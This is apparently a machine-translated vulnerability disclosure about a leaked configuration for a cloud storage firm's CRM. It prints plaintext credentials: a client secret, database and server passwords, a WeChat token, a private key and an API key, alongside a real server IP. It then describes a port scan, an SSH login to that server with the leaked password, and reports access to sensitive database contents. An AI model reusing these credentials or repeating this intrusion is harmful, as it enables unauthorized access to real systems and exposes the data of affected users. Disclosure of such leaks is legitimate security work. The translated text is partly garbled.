Quick enough for a cloud database to leak sensitive information to servers/tokens/database passwords (affecting 1.69 million enterprise user data)
Quick enough for a cloud database to leak sensitive information to servers/tokens/database passwords (affecting 1.69 million enterprise user data)
Http://crm.goukuai.cn/auth/login
Http: // 121.199.3.197/login
YUNKU.CRM_CLIENT_ID59033a1e2c3c8c60f9bcf23eee51974dYUNKU.CRM_CLIENT_SECRETe8cee4610343e2d951a9a875354063feYUNKU.DB_HOSTrdsquzbunurvfez.mysql.rds.aliyuncs.comYUNKU.DB_DATABASEgktestYUNKU.DB_USER_NAMEgokuaitestuserYUNKU.DB_USER_PSWalaserverYUNKU.SERVER_PSWgokua1serverYUNKU.SERVER_USER_NAMEalaYUNKU.SERVER_ROOT/home/alaCRM.DB_HOST127.0.0.1:3306CRM.DB_DATABASEgkstat_testCRM.DB_USER_NAMEala_productCRM.DB_USER_PSWgokuai1serverCRM.SERVER_USER_NAMEalaCRM.SERVER_PSWgokua1serverCRM.SERVER_ROOT/home/alaCRM.MEMCACHED_HOST127.0.0.1CRM.MEMCACHED_PORT22122MAIL.HOSTmail.gokuai.comMAIL.DEBUGWECHAT.TOKENP4pKKWBvhtdA4IZDR7Q4NtCa4fDOMAIN.YUNKUzk.goukuai.cnPRIVATE_KEYA7yVktb5tLILZlra8qqP47DiKF8xFcZmAPI_KEY57ab07936c42b9139facc4e9f996afa
CRM. SERVER_USER_NAMEala
CRM. SERVER_PSWgokua1server
It may be the server password. I tried to connect and found port 22 was not open. I guess I may have changed the port and scanned it.
PORT STATE SERVICE80/tcp open http443/tcp open https3306/tcp open mysql11300/tcp open unknown27822/tcp open unknown
Ssh-p 27822 [email protected] Password: gokua1server
Decisively connected
There is a lot of sensitive content in the database.